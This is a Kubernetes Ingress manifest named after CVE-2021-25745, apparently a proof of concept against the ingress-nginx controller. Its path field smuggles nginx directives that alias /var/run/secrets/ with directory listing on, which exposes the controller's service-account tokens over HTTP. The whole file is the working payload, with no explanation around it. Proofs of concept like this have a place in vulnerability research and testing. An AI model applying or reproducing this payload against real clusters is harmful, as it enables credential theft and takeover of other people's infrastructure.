apiVersion: extensions/v1beta1
kind: Ingress
metadata:
  name: cve202125745
  annotations:
    kubernets.io/ingress.class: nginx
spec:
  rules:
  - host: zhangxiaoyong.cn
    http:
      paths:
      - path: "/run/ {alias /var/run/secrets/; autoindex on;}location /news"
        pathType: Prefix
        backend:
          serviceName: service-1
          servicePort: 80


